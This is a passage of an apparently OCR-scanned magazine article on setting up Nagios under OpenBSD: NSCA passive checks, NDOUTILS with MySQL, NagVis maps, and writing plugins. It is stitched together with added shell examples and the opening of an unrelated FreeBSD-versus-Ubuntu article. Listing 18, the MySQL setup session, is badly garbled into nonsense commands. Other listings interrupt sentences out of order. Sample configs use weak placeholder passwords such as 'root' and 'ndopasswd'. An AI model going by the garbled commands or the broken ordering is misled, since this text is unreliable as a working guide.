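    output = proc.stdout if proc.returncode == 0 else (proc.stderr or proc.stdout)
    return format_result(host, service, state,
                         output or "exit status %d" % proc.returncode)


if __name__ == "__main__":
    # Constructed stand-in for a nightly backup job that succeeds.
    sys.stdout.write(run_and_report(
        "backup.example", "nightly backup",
        [PYTHON, "-c", "print('archive written'); raise SystemExit(0)"]))
```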


Server configuration 

NSCA can run either as a standalone daemon or under 
inetd(8) (http://www.openbsd.org/cgi-bin/man.cgi?query=i 
netd&sektion=8). To install the server component we need 
to add the following packages on the Nagios server: 

• mhash-x.x.x.tgz 
• libmcrypt-x.x.x.tgz 
• nsca-x.x.tgz 


Next, we need to edit the /etc/nsca.cfg configuration file: 
see Listing 17. You should set restrictive permissions (600) 
on the configuration file in order to keep the decryption 
password protected. To run NSCA as a standalone 
daemon, simply type: 


# /usr/local/sbin/nsca -c /etc/nsca.cfg 


and add the following lines to /etc/rc.local to start it 
automatically after reboot: 

/etc/rc.local 
if [ -x /usr/local/sbin/nsca ]; then 
    echo -n ' nsca' 
    /usr/local/sbin/nsca -c /etc/nsca.cfg 
fi 


Alternatively, you can run it under inetd(8) 
(http://www.openbsd.org/cgi-bin/man.cgi?query=inetd&s 
ektion=8) by adding the following line in /etc/inetd.conf(8) 
(http://www.openbsd.org/cgi-bin/man.cgi?query=inetd.c 
onf&sektion=8): 

/etc/inetd.conf 
nsca stream tcp wait _nagios:_nagios /usr/local/sbin/nsca nsca -c /etc/nsca.cfg --inetd 

and by adding the nsca service in /etc/services(5) (http:// 
www.openbsd.org/cgi-bin/man.cgi?query=services&sek 
tion=5): 

/etc/services 
nsca 5667/tcp # Nagios Service Check Acceptor 

and then send the inetd(8) (http://www.openbsd.org/ 
cgi-bin/man.cgi?query=inetd&sektion=8) daemon the 
hangup signal, instructing it to re-read its configuration: 
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Listing 18. The database creation script 


# cp /usr/local/share/mysgl/my-medium.cnf /etc/my.cnf 
7? usr 1ocal/bin/mysds install jap 
Peete oh 
# mysqld safe & 
Starting mysqld daemon with databases from /var/mysql 
¢ 7st lecal/Din7myeqs secure anecallacion 
Renal 
Enter current password for root (enter for none): 
Se ieie 
PEvert 
Set foot password? |Y/m]| ¥ 
New password: root 
Re-enter new password: root 
ternal 
Remove anonymous users? [Y/n] Y 
i eed 
Disallow root login remotely? [Y/n] Y 
eae at 
Remove test database and access to it? [Y/n] Y 
[fk eeeewil 
Reload privilege tables now? [Y/n] Y 
Peer 
# mysql -—W Toot =p 
password: root 
Welcome to the MySQL monitor. Commands end with ; or 
VG 
Server version: 5.0.5la-log OpenBSD port: mysql-server- 


50 pola 


Type 'help;' or '\h' for help. Type '\c' to clear the 
Dither: 


mysql> create database nagios; 


Query OK, 1 row affected (0.02 sec) 


mysql> Wse nagios; 

Database changed 

mysql \= sdo/mysqlasal 

eeeta) 

mysql> GRANT SELECT, INSERT, UPDATE, DELETE ON nagios.* 
TO 'ndouser'@'localhost' IDENTIFIED 
By 'ndopasswd"; 

mysql \Gq 


Listing 19. Editing the NDOMOD configuration file 


/var/www/etc/nagios/ndomod.cfg 
instance_name=default 
output_type=unixsocket 
# Must be the same socket ndo2db listens on (socket_name in ndo2db.cfg) 
output=/var/www/var/nagios/rw/ndo.sock 
output_buffer_items=5000 
buffer_file=/var/www/var/nagios/rw/ndomod.tmp 
file_rotation_interval=14400 
file_rotation_timeout=60 
reconnect_interval=15 
reconnect_warning_interval=15 
data_processing_options=-1 
config_output_options=3 


Listing 20. The NDO2DB configuration file 


/var/www/etc/nagios/ndo2db.cfg 
lock_file=/var/run/nagios/ndo2db.lock 
ndo2db_user=_nagios 
ndo2db_group=_nagios 
socket_type=unix 
socket_name=/var/www/var/nagios/rw/ndo.sock 
db_servertype=mysql 
db_host=localhost 
db_port=3306 
db_name=nagios 
db_prefix=nagios_ 
db_user=ndouser 
db_pass=ndopasswd 
max_timedevents_age=1440 
max_systemcommands_age=10080 
max_servicechecks_age=10080 
max_hostchecks_age=10080 
max_eventhandlers_age=44640 
debug_level=0 
debug_verbosity=1 
debug_file=/var/www/var/log/nagios/ndo2db.debug 
max_debug_file_size=1000000 
# pkill -HUP inetd 


Client configuration 
On the client side, we need to install the following 
packages: 


• mhash-x.x.x.tgz 
• libmcrypt-x.x.x.tgz 
• nsca-client-x.x.tgz 


and edit the encryption parameters in the /etc/send_nsca.cfg 
configuration file, so that they match the password and 
encryption method configured in nsca.cfg on the server; as 
on the server, keep this file readable by root only, since it 
holds the shared secret: 


/etc/send_nsca.cfg 

# Password to use to encrypt outgoing packets 
password=password 

# Encryption method (16 = RIJNDAEL-256) 
encryption_method=16 


The send_nsca utility reads data from standard input and 
expects, for service checks, a tab-separated sequence 
of host name, service description (i.e. the value of the 
service_description directive in the service definition), 
return code and output; e.g.: 

echo "www1\tbackup\t0\tBackup completed successfully" | \ 
    /usr/local/libexec/nagios/send_nsca -H nagios.kernel-panic.it 


and, for host checks, a tab-separated sequence of host 
name, return code and output; e.g.: 


echo "router1\t2\tRouter 1 is down" | /usr/local/libexec/nagios/send_nsca -H \ 
    nagios.kernel-panic.it 


You can override the default delimiter (tab) with send_nsca's 
-d option. The host name and service description must match 
the Nagios object definitions exactly, and the target service 
must accept passive checks (passive_checks_enabled in the 
service definition, accept_passive_service_checks in 
nagios.cfg), otherwise the result is silently dropped. Now, if 
everything is working fine, each message received by the 
NSCA daemon should produce a line like the following in the 
Nagios log file: 


/var/www/var/log/nagios/nagios.log 
[1167325538] EXTERNAL COMMAND: PROCESS_SERVICE_CHECK_RESULT;www1;backup;0;Backup completed successfully 
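The following is an added example, not part of the original article: a small POSIX sh wrapper that a monitored host could call from cron to run a job and submit its outcome to the Nagios server as a passive service check through send_nsca. It builds the tab-separated record described above, strips tabs and newlines from the command output (either character would corrupt the record, since NSCA splits fields on tabs and records on newlines), maps the job's exit status to a Nagios state (0 is OK, anything else CRITICAL) and supports a dry run that prints the record instead of sending it. The server name is the one used in the article; the service name 'backup', the run-backup command and the 512-byte output cap are assumptions made for the example.

```shell
#!/bin/sh
# Added example (not from the article): run a job and report its result to the
# Nagios server as a passive service check through send_nsca.
# Assumptions: the server name is the one the article uses; 512 bytes is
# assumed as a safe cap for the plugin output NSCA will accept.

NAGIOS_SERVER=${NAGIOS_SERVER:-nagios.kernel-panic.it}
SEND_NSCA=${SEND_NSCA:-/usr/local/libexec/nagios/send_nsca}
SEND_NSCA_CFG=${SEND_NSCA_CFG:-/etc/send_nsca.cfg}
MAX_OUTPUT=512

# Collapse the text to one line: NSCA splits fields on tabs and records on
# newlines, so either character inside the output would corrupt the record.
nsca_clean_output() {
    printf '%s' "$1" | tr '\t\n' '  ' | cut -c 1-"$MAX_OUTPUT"
}

# Service check record: host<TAB>service<TAB>return code<TAB>output
nsca_service_line() {
    printf '%s\t%s\t%s\t%s\n' "$1" "$2" "$3" "$(nsca_clean_output "$4")"
}

# Host check record: host<TAB>return code<TAB>output
nsca_host_line() {
    printf '%s\t%s\t%s\n' "$1" "$2" "$(nsca_clean_output "$3")"
}

# Map a job's exit status to a Nagios state: 0 is OK, anything else CRITICAL
nsca_state_for_rc() {
    if [ "$1" -eq 0 ]; then echo 0; else echo 2; fi
}

# Run "$3 ..." and submit the outcome as a passive check for service $2 on
# host $1. With NSCA_DRY_RUN=1 the record is printed instead of being sent.
# Returns the job's own exit status, so cron still sees failures.
report_job() {
    host=$1; service=$2; shift 2
    if out=$("$@" 2>&1); then rc=0; else rc=$?; fi
    state=$(nsca_state_for_rc "$rc")
    line=$(nsca_service_line "$host" "$service" "$state" "${out:-exit status $rc}")
    if [ "${NSCA_DRY_RUN:-0}" = 1 ]; then
        printf '%s\n' "$line"
    else
        printf '%s\n' "$line" | "$SEND_NSCA" -H "$NAGIOS_SERVER" -c "$SEND_NSCA_CFG"
    fi
    return "$rc"
}

# Typical crontab use on www1 (run-backup is a constructed stand-in command):
#   report_job www1 backup /usr/local/sbin/run-backup
```

Because the job's output is captured and forwarded, the Nagios status page shows the last line of what the backup printed rather than just a state, and a command that produces no output still yields a readable record ("exit status N").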


NagVis and NDO 

NagVis is a visualization addon for Nagios; it can be used 
to give users a graphical view (http://www.nagvis.org/ 
doku.php?id=screenshots) of Nagios data. It requires the 
installation of PHP (http://www.php.net/) and a few libraries: 

• libxml-x.x.x.tgz 
• (package name illegible) 
• jpeg-x.tgz 
• png-x.x.x.tgz 
• php5-core-x.x.x.tgz 
• php5-gd-x.x.x-no_x11.tgz 
• mysql-client-x.x.x.tgz 
• php5-mysql-x.x.x.tgz 


Apache is already up and running, so we only need to 
enable the php modules we have just installed: 


# ln -s /var/www/conf/modules.sample/php5.conf /var/www/conf/modules 
# ln -fs /var/www/conf/php5.sample/gd.ini /var/www/conf/php5/gd.ini 
# ln -fs /var/www/conf/php5.sample/mysql.ini /var/www/conf/php5/mysql.ini 


uncomment the following line in /var/www/conf/httpd.conf: 


/var/www/conf/httpd.conf 
AddType application/x-httpd-php .php 


and restart Apache: 


# apachectl restart 


/usr/sbin/apachectl restart: httpd restarted 


Installing NDO and MySQL 

Prior to version 1.0, NagVis was able to pull data from Nagios 
directly from its web interface; this is not supported 
anymore and NagVis now expects monitoring data to be stored 
in a MySQL database, thus requiring the installation of the 
Nagios Data Output Utils (NDOUTILS) addon. 

The NDOUTILS addon allows you to export current 
and historical data from one or more Nagios instances to 
a MySQL database, thus providing the interface between 
Nagios and MySQL. This addon consists of several parts, 
but we will need only two of them: 


• the NDOMOD event broker module, which is loaded 
  by Nagios at startup and dumps all events and data 
  from Nagios to a Unix or TCP socket; 

• the NDO2DB daemon, which is a standalone daemon 
  that reads the output produced by the NDOMOD 
  module through the Unix or TCP socket and dumps it 
  into the database. 


First off, we need to install MySQL; the following is the 
list of the required packages: 
Listing 21. The NagVis configuration file 


/var/www/nagios/nagvis/etc/nagvis.ini.php 
; <?php return 1; ?> 

[global] 
language = "en_US" 
refreshtime = 60 
dateformat = "Y-m-d H:i:s" 

[defaults] 
backend = "ndomy_1" 
; Default icons size (icons can be found in 
; /var/www/nagios/nagvis/images/iconsets) 
icons = "std_medium" 
recognizeservices = 1 
onlyhardstates = 0 
backgroundcolor = "#fff" 
contextmenu = 1 
eventbackground = 0 
eventhighlight = 1 
eventhighlightduration = 10000 
eventhighlightinterval = 500 
eventlog = 0 
eventloglevel = "info" 
eventlogheight = 75 
eventloghidden = 1 
eventscroll = 1 
eventsound = 1 
headermenu = 1 
headertemplate = "default" 
hovermenu = 1 
hovertemplate = "default" 
hoverdelay = 0 
hoverchildsshow = 1 
hoverchildslimit = 10 
hoverchildsorder = "asc" 
hoverchildssort = "s" 
showinlists = 1 
urltarget = "_self" 
hosturl = "[htmlcgi]/status.cgi?host=[host_name]" 
hostgroupurl = "[htmlcgi]/status.cgi?hostgroup=[hostgroup_name]" 
serviceurl = "[htmlcgi]/extinfo.cgi?type=2&host=[host_name]&service=[service_description]" 
servicegroupurl = "[htmlcgi]/status.cgi?servicegroup=[servicegroup_name]&style=detail" 

[wui] 
autoupdatefreq = 25 
maplocktime = 5 
allowedforconfig = nagiosadmin 

[paths] 
base = "/nagios/nagvis/" 
htmlbase = "/nagios/nagvis" 
htmlcgi = "/cgi-bin/nagios" 

[index] 
backgroundcolor = "#fff" 
cellsperrow = 4 
headermenu = 1 
headertemplate = "default" 
showrotations = 1 

[automap] 
defaultparams = "&maxLayers=2" 
showinlists = 0 

[worker] 
interval = 10 
requestmaxparams = 0 
requestmaxlength = 1900 
updateobjectstates = 30 

[backend_ndomy_1] 
backendtype = "ndomy" 
dbhost = "localhost" 
dbport = 3306 
dbname = "nagios" 
dbuser = "ndouser" 
dbpass = "ndopasswd" 
dbprefix = "nagios_" 
dbinstancename = "default" 
maxtimewithoutupdate = 180 
htmlcgi = "/cgi-bin/nagios" 

; In this example, the browser switches between the 'dmz' and 'lan' maps every 
; 15 seconds. The rotation is enabled by specifying the URL: 
; https://your.nagios.server/nagios/nagvis/index.php?rotation=kp 
[rotation_kp] 
maps = "dmz,lan" 
interval = 15 

• p5-Net-Daemon-x.x.tgz 
• p5-PlRPC-x.x.tgz 
• p5-DBI-x.x.tgz 
• p5-DBD-mysql-x.x.tgz 
• mysql-server-x.x.x.tgz 


Next, we need to download (http://sourceforge.net/ 
project/showfiles.php?group_id=26589), extract and 
compile the NDOUTILS tarball: 


# tar -zxvf ndoutils-x.x.x.tar.gz 
[...] 
# cd ndoutils-x.x.x 
# ./configure --disable-pgsql --enable-mysql --with-mysql-lib=/usr/local/lib \ 
    --with-mysql-inc=/usr/local/include 
[...] 
# make 
[...] 


Note: if make fails to compile the dbhandlers.c file, try 
installing this patch (http://www.kernel-panic.it/openbsd/ 
nagios/ndo-openbsd.patch, which applies to version 1.4b9) by 
running the following command from outside the ndoutils 
source tree: 








Listing 22. A sample map configuration 


/var/www/nagios/nagvis/etc/maps/dmz.cfg 
# The 'global' statement sets some default values that will be inherited by all 
# other objects 
define global { 
    # List of users allowed to view this map 
    allowed_user=nagiosadmin,operator 
    # List of users allowed to modify this map via the web interface 
    allowed_for_config=nagiosadmin 
    # Default iconset (if omitted, it is inherited from the main configuration file) 
    iconset=std_medium 
    # Background image 
    map_image=dmz.png 
} 
# Display the status of our 'www1' web server 
define host { 
    host_name=www1 
    # Coordinates of the host on the map 
    x=268 
    y=166 
    # Set this to '1' if you want the host status to also include the status 
    # of its services 
    recognize_services=0 
} 
# Display the status of the 'WWW' service on the 'www1' web server 
define service { 
    host_name=www1 
    service_description=WWW 
    x=588 
    y=165 
    # As you can see, 'global' options can be overridden in subsequent objects 
    iconset=std_small 
} 
# Display the worst state of hosts in the 'WWW' hostgroup 
define hostgroup { 
    hostgroup_name=WWW 
    x=298 
    y=363 
    recognize_services=1 
} 
# Display the worst state of services in the 'www-services' servicegroup 
define servicegroup { 
    servicegroup_name=www-services 
    x=609 
    y=363 
} 
# Display the worst state of objects represented in another NagVis map 
define map { 
    map_name=lan 
    x=406 
    y=323 
} 
# Draw a textfield on the map 
define textbox { 
    # Text may include HTML 
    text="This is the DMZ network" 
    x=490 
    y=394 
    w=117 
} 
Listing 23. A plugin to monitor the amount of free memory on the local machine 


/usr/local/libexec/nagios/check_free_mem.sh 


#!/bin/ksh 
############################################################################### 
# Sample Nagios plugin to monitor free memory on the local machine            # 
# Author: Daniele Mazzocchio (http://www.kernel-panic.it/)                    # 
############################################################################### 

VERSION="Version 1.0" 
AUTHOR="(c) 2007-2009 Daniele Mazzocchio (danix@kernel-panic.it)" 

PROGNAME=`/usr/bin/basename $0` 

# Constants 
BYTES_IN_MB=$(( 1024 * 1024 )) 
KB_IN_MB=1024 

# Exit codes 
STATE_OK=0 
STATE_WARNING=1 
STATE_CRITICAL=2 
STATE_UNKNOWN=3 

# Helper functions ############################################################ 

function print_revision { 
    # Print the revision number 
    echo "$PROGNAME - $VERSION" 
} 

function print_usage { 
    # Print a short usage statement 
    echo "Usage: $PROGNAME [-v] -w <limit> -c <limit>" 
} 

function print_help { 
    # Print detailed help information 
    print_revision 
    echo "$AUTHOR\n\nCheck free memory on local machine\n" 
    print_usage 
    /bin/cat <<__EOT 

Options: 
-h 
   Print detailed help screen 
-V 
   Print version information 
-w INTEGER 
   Exit with WARNING status if less than INTEGER MB of memory are free 
-w PERCENT% 
   Exit with WARNING status if less than PERCENT of memory is free 
-c INTEGER 
   Exit with CRITICAL status if less than INTEGER MB of memory are free 
-c PERCENT% 
   Exit with CRITICAL status if less than PERCENT of memory is free 
-v 
   Verbose output 
__EOT 
} 

# Main ######################################################################## 

# Total memory size (in MB) 
tot_mem=$(( `/sbin/sysctl -n hw.physmem` / BYTES_IN_MB )) 
# Free memory size (in MB) 
free_mem=$(( `/usr/bin/vmstat | /usr/bin/tail -1 | /usr/bin/awk '{ print $5 }'` / KB_IN_MB )) 
# Free memory size (in percentage) 
free_mem_perc=$(( free_mem * 100 / tot_mem )) 

# Verbosity level 
verbosity=0 
# Warning threshold 
thresh_warn= 
# Critical threshold 
thresh_crit= 

# Parse command line options 
while [ "$1" ]; do 
    case "$1" in 
        -h | --help) 
            print_help 
            exit $STATE_OK 
            ;; 
        -V | --version) 
            print_revision 
            exit $STATE_OK 
            ;; 
        -v | --verbose) 
            : $(( verbosity++ )) 
            shift 
            ;; 
        -w | --warning | -c | --critical) 
            if [[ -z "$2" || "$2" = -* ]]; then 
                # Threshold not provided 
                echo "$PROGNAME: Option '$1' requires an argument" 
                print_usage 
                exit $STATE_UNKNOWN 
            elif [[ "$2" = +([0-9]) ]]; then 
                # Threshold is a number (MB) 
                thresh=$2 
            elif [[ "$2" = +([0-9])% ]]; then 
                # Threshold is a percentage 
                thresh=$(( tot_mem * ${2%\%} / 100 )) 
            else 
                # Threshold is neither a number nor a percentage 
                echo "$PROGNAME: Threshold must be integer or percentage" 
                print_usage 
                exit $STATE_UNKNOWN 
            fi 
            [[ "$1" = *-w* ]] && thresh_warn=$thresh || thresh_crit=$thresh 
            shift 2 
            ;; 
        -?) 
            print_usage 
            exit $STATE_OK 
            ;; 
        *) 
            echo "$PROGNAME: Invalid option '$1'" 
            print_usage 
            exit $STATE_UNKNOWN 
            ;; 
    esac 
done 

if [[ -z "$thresh_warn" || -z "$thresh_crit" ]]; then 
    # One or both thresholds were not specified 
    echo "$PROGNAME: Threshold not set" 
    print_usage 
    exit $STATE_UNKNOWN 
elif [[ "$thresh_crit" -gt "$thresh_warn" ]]; then 
    # The warning threshold must be greater than the critical threshold 
    echo "$PROGNAME: Warning free space should be more than critical free space" 
    print_usage 
    exit $STATE_UNKNOWN 
fi 

if [[ "$verbosity" -ge 2 ]]; then 
    # Print debugging information 
    /bin/cat <<__EOT 
Debugging information: 
  Warning threshold: $thresh_warn MB 
  Critical threshold: $thresh_crit MB 
  Verbosity level: $verbosity 
  Total memory: $tot_mem MB 
  Free memory: $free_mem MB ($free_mem_perc%) 
__EOT 
fi 

if [[ "$free_mem" -lt "$thresh_crit" ]]; then 
    # Free memory is less than the critical threshold 
    echo "MEMORY CRITICAL - $free_mem_perc% free ($free_mem MB out of $tot_mem MB)" 
    exit $STATE_CRITICAL 
elif [[ "$free_mem" -lt "$thresh_warn" ]]; then 
    # Free memory is less than the warning threshold 
    echo "MEMORY WARNING - $free_mem_perc% free ($free_mem MB out of $tot_mem MB)" 
    exit $STATE_WARNING 
else 
    # There's enough free memory! 
    echo "MEMORY OK - $free_mem_perc% free ($free_mem MB out of $tot_mem MB)" 
    exit $STATE_OK 
fi 
Network monitoring with Nagios and OpenBSD 


# patch -p0 < ndo-openbsd.patch 


Now we can start MySQL, assign a password to the root 
account (the listing uses "root" only as a placeholder; pick a 
strong one) and create the appropriate database and user. 
The database creation script can be found in the db/ 
directory of the extracted tarball (see Listing 18). 

Now we need to manually copy the binaries and 
configuration files: 


# cp src/ndomod-3x.o /usr/local/libexec/nagios/ndomod.o 

# cp config/ndomod.cfg-sample /var/www/etc/nagios/ 
ndomod.cfg 

# cp src/ndo2db-3x /usr/local/sbin/ndo2db 

# cp config/ndo2db.cfg-sample /var/www/etc/nagios/ 
ndo2db.cfg 


and edit the NDOMOD configuration file: see Listing 19. 
And the NDO2DB configuration file: see Listing 20. 

Then we have to specify the event broker module that 
Nagios must load at startup, by adding the following line 
to the main configuration file: 


/var/www/etc/nagios/nagios.cfg 
broker_module=/usr/local/libexec/nagios/ndomod.o config_file=/var/www/etc/nagios/ndomod.cfg 


and, finally, we can start the NDO2DB daemon and 
restart Nagios: 


# /usr/local/sbin/ndo2db -c /var/www/etc/nagios/ndo2db.cfg 
# chmod 770 /var/www/var/nagios/rw/ndo.sock 
# pkill nagios 


# nagios -d /var/www/etc/nagios/nagios.cfg 


Add the following lines to /etc/rc.local to start the 
NDO2DB daemon on boot (ndo2db creates the socket after it 
detaches, so on a slow machine a short sleep before the 
chmod may be needed): 


/etc/rc.local 
if [ -x /usr/local/sbin/ndo2db ]; then 
    echo -n ' ndo2db' 
    /usr/local/sbin/ndo2db -c /var/www/etc/nagios/ndo2db.cfg 
    chmod 770 /var/www/var/nagios/rw/ndo.sock 
fi 


Configuring NagVis 

Now that we have installed all the necessary prerequisites, 
we can download (http:/www.nagvis.org/downloads) and 
extract the NagVis tarball: 


# tar -zxvf nagvis-x.x.x.tar.gz -C /var/www/nagios/ 
[...] 
# mv /var/www/nagios/nagvis-x.x.x /var/www/nagios/nagvis 
# chown -R www /var/www/nagios/nagvis/{etc,var} 


Listing 21 shows a sample NagVis configuration file; please 
refer to the documentation (http://docs.nagvis.org/1.3/ 
en_US/index.html) for a detailed description of each 
parameter. 


Maps definition 

Now we have to create the images for NagVis to use as the 
background for each map and put them in the /var/www/nagios/ 
nagvis/images/maps/ directory. You can find a few examples here 
(http://www.nagvis.org/screenshots). Once the map images 
are ready, we can tell NagVis where to place objects on the 
map by creating and editing the map configuration files. Each 
map must have a corresponding configuration file (in /var/www 
/nagios/nagvis/etc/maps/) with the same name, plus the .cfg 
extension. 

Listing 22 shows a sample map configuration file; the syntax is 
rather simple, so you can easily tweak it to include your 
own hosts and services (please refer to the documentation 
(http://docs.nagvis.org/1.3/en_US/index.html) for further 
details). 

To allow the web interface to modify NagVis' 
configuration, make sure that all map configuration files belong 
to, and are writable by, the www user: 


# chown www /var/www/nagios/nagvis/etc/maps/*.cfg 
# chmod 644 /var/www/nagios/nagvis/etc/maps/*.cfg 


Note that nagvis.ini.php contains the NDO database password; 
since Apache runs as www, that file needs no permissions 
beyond those of its owner, so do not leave it world-readable. 


Writing your own Nagios plugins 

Plugins are executable files run by Nagios to determine 
the status of a host or service. By default, Nagios comes 
with a very rich set of official plugins that should cover 
most people's needs; in addition, you can find lots of 
contributed plugins on the Monitoring Exchange website 
(http://www.monitoringexchange.org/), some of which 
are also available via OpenBSD's packages and ports 
system. 

However, despite the abundance of plugins, there may 
be occasions in which no existing plugin is suitable for 
monitoring a particular service, thus forcing you to write 
a fully custom plugin, tailored to your exact needs. Luckily, 
this is a very simple task! 

Nagios doesn't bind you to a specific programming 
language: plugins may be either compiled C programs 
or interpreted scripts, in Perl, shell, Python or any other 
language. Nagios doesn't mess with the internals of 
plugins; however, it asks developers to follow a few basic 
guidelines (http://nagiosplug.sourceforge.net/developer- 
guidelines.html), for the sake of standardization. 
Table 1. Valid plugin return codes 


Return code  Service/Host status  Service status description                      Host status description 

0            OK/Up                The plugin was able to check the service        The host is up and replied in acceptable time 
                                  and it seemed to work correctly 

1            Warning/Up           The plugin was able to check the service, but   The host is up (a WARNING result counts as UP 
                                  it was above some "warning" threshold or did    unless aggressive host checking is enabled) 
                                  not appear to be working properly 

2            Critical/Down        The service was not running or it exceeded      The host is down or some "critical" threshold 
                                  some "critical" threshold                       was exceeded 

3            Unknown/Down         Invalid command line arguments were supplied    The plugin could not determine the host state; 
                                  to the plugin or it was unable to perform       Nagios treats the host as down 
                                  the check 
Command line options 
A plugin's command line must follow some specific 
requirements: 


• positional arguments are strongly discouraged; 

• all plugins should provide a -V command-line option 
  (and --version if long options are enabled) to display 
  the plugin's revision number; 

• the -? option, as well as any incorrect option, displays 
  a short usage statement that should fit on a standard 
  80x25 terminal; 

• the -h, or --help, option displays detailed help 
  information; 

• the -v, or --verbose, option adjusts the verbosity level; 
  multiple -v options (up to 3) should increase the 
  verbosity level, as described in the official guidelines 
  (http://nagiosplug.sourceforge.net/developer- 
  guidelines.html#AEN40); 

• there are a few other reserved options that should 
  not be used for other purposes: 
  • -t or --timeout (plugin timeout); 
  • -w or --warning (warning threshold); 
  • -c or --critical (critical threshold); 
  • -H or --hostname (name of the host to check). 

Plugin return codes 

Nagios determines the status of a host or service based 
on the return code of the plugin. Valid return codes are: 
see Table 1. 
The warning and critical thresholds are usually set via 
command line options (see above: http://www.kernel- 
panic.it/openbsd/nagios/nagios6.html#nagios-6.1). 


A sample plugin script 
Just a couple of notes before moving to a practical 
example: 


• plugins can access macros (http:// 
  nagios.sourceforge.net/docs/2_0/macros.html) as 
  environment variables; such variables have the same 
  name as the corresponding macros, with NAGIOS_ 
  prepended. For instance, the $HOSTNAME$ macro will 
  be accessible through the NAGIOS_HOSTNAME 
  environment variable; 

• always specify the full path of any system commands 
  run from your plugins. 


Well, so let's see, as an example, what a plugin to 
monitor the amount of free memory on the local machine 
could look like: see Listing 23. 
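As an added example (not part of the article, and distinct from the author's memory check in Listing 23), here is a free-disk-space plugin in POSIX sh that exercises the guidelines just listed: the reserved -w/-c options accept either MB or a percentage and are validated against each other, -V/-h/-v behave as prescribed, external commands are called by full path, the NAGIOS_HOSTNAME environment macro is shown in verbose mode, the exit code is one of the four states from Table 1, and the status line carries performance data after the '|' separator, which Nagios parses as label=value[unit];warn;crit;min;max. The script name check_disk_free.sh, its -p option and the DISK label are hypothetical names chosen for this example.

```shell
#!/bin/sh
# Added example, not part of the article: a small free-space plugin written
# against the guidelines above. 'check_disk_free.sh', its -p option and the
# DISK label are hypothetical names chosen for this example.

STATE_OK=0; STATE_WARNING=1; STATE_CRITICAL=2; STATE_UNKNOWN=3
PROGNAME=${0##*/}
VERSION="0.1"

print_usage() { echo "Usage: $PROGNAME [-v] [-p <path>] -w <limit>[%] -c <limit>[%]"; }

# Free and total space of the filesystem holding $1, in KB, from POSIX df -P
# output (Filesystem 1024-blocks Used Available Capacity Mounted-on). Full
# paths, as the guidelines ask, because Nagios runs plugins with a minimal PATH.
fs_free_kb()  { /bin/df -Pk "$1" 2>/dev/null | /usr/bin/awk 'NR == 2 { print $4 }'; }
fs_total_kb() { /bin/df -Pk "$1" 2>/dev/null | /usr/bin/awk 'NR == 2 { print $2 }'; }

# Turn a threshold given as MB ("512") or as a percentage of the total size $2
# ("10%") into KB; fail on anything else so the caller can answer UNKNOWN.
threshold_kb() {
    case "$1" in
        '' | *[!0-9%]* | *%?* | %) return 1 ;;
        *%) pct=${1%\%}; echo $(( $2 * pct / 100 )) ;;
        *)  echo $(( $1 * 1024 )) ;;
    esac
}

# Nagios state for free KB $1 against warning KB $2 and critical KB $3
state_for_free() {
    if [ "$1" -lt "$3" ]; then echo $STATE_CRITICAL
    elif [ "$1" -lt "$2" ]; then echo $STATE_WARNING
    else echo $STATE_OK
    fi
}

state_name() {
    case "$1" in 0) echo OK ;; 1) echo WARNING ;; 2) echo CRITICAL ;; *) echo UNKNOWN ;; esac
}

# One-line status text followed by performance data; Nagios parses what comes
# after '|' as label=value[unit];warn;crit;min;max and hands it to graphing tools.
plugin_output() {   # state free_kb total_kb warn_kb crit_kb
    free_mb=$(( $2 / 1024 )); total_mb=$(( $3 / 1024 )); pct=$(( $2 * 100 / $3 ))
    printf 'DISK %s - %d%% free (%d MB out of %d MB)|free=%dMB;%d;%d;0;%d\n' \
        "$(state_name "$1")" "$pct" "$free_mb" "$total_mb" \
        "$free_mb" $(( $4 / 1024 )) $(( $5 / 1024 )) "$total_mb"
}

main() {
    path=/; warn=; crit=; verbosity=0
    while [ $# -gt 0 ]; do
        case "$1" in
            -h | --help)    print_usage; exit $STATE_OK ;;
            -V | --version) echo "$PROGNAME $VERSION"; exit $STATE_OK ;;
            -v | --verbose) verbosity=$(( verbosity + 1 )); shift ;;
            -p | -w | -c)
                [ $# -ge 2 ] || { echo "$PROGNAME: option '$1' requires an argument"; print_usage; exit $STATE_UNKNOWN; }
                case "$1" in -p) path=$2 ;; -w) warn=$2 ;; -c) crit=$2 ;; esac
                shift 2 ;;
            *)  print_usage; exit $STATE_UNKNOWN ;;
        esac
    done
    total=$(fs_total_kb "$path"); free=$(fs_free_kb "$path")
    if [ -z "$total" ] || [ -z "$free" ]; then
        echo "DISK UNKNOWN - cannot read filesystem statistics for $path"; exit $STATE_UNKNOWN
    fi
    if ! warn_kb=$(threshold_kb "$warn" "$total") || ! crit_kb=$(threshold_kb "$crit" "$total"); then
        echo "DISK UNKNOWN - -w and -c must be integer MB or a percentage"; exit $STATE_UNKNOWN
    fi
    if [ "$crit_kb" -ge "$warn_kb" ]; then
        echo "DISK UNKNOWN - warning threshold must be above the critical one"; exit $STATE_UNKNOWN
    fi
    if [ "$verbosity" -ge 2 ]; then
        # Nagios exports its macros to plugins as NAGIOS_* environment variables
        echo "host=${NAGIOS_HOSTNAME:-(not run by Nagios)} path=$path total=${total}KB free=${free}KB warn=${warn_kb}KB crit=${crit_kb}KB"
    fi
    state=$(state_for_free "$free" "$warn_kb" "$crit_kb")
    plugin_output "$state" "$free" "$total" "$warn_kb" "$crit_kb"
    exit "$state"
}

# Act as a plugin only when given arguments, so the functions above can also be
# sourced or exercised without running a check.
if [ $# -gt 0 ]; then main "$@"; fi
```

Run it as `check_disk_free.sh -p /var -w 10% -c 512` from a Nagios command definition; every malformed input path ends in UNKNOWN with a one-line explanation rather than in a shell error, which is what keeps the plugin's exit status meaningful to Nagios.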
The Difference Between FreeBSD and Ubuntu in a Not So Technical Way 


As a system administrator, I have been using various distributions 
of Linux and FreeBSD. I am comfortable in a mixed environment of 
*nix operating systems to provide network services. 


possible so as not to start a flame war. I enjoy working 
with both systems and I like the way they are. 

FreeBSD is a complete operating system. Userland 
utilities, drivers for the devices, and the kernel itself are 
available and held in a centralized location/repository. 
Linux on the other hand is actually just the kernel. 
Companies and organizations release their distribution/ 
flavor by using and customizing the Linux kernel, bundling it 
with software/packages, mostly free and open-source 
software, and optionally adding some proprietary materials, 
drivers or codecs. This is the case for Ubuntu, the Linux 
distribution released by Canonical, Inc. 

The default shell for regular users in FreeBSD is sh (the 
Bourne Shell) and tcsh (the improved C Shell) for the root user. 
In Ubuntu it is bash all the way. In terms of application 
configuration files, rest assured that FreeBSD keeps them 
in /usr/local/etc. Ubuntu, on the other hand, has this 
directory empty. Ubuntu uses /etc and its subfolders 
for application configuration files. FreeBSD also uses the / 
etc/rc.conf file, which according to the man page, contains 
descriptive information about the local host name, 
configuration details for any potential network interfaces, 
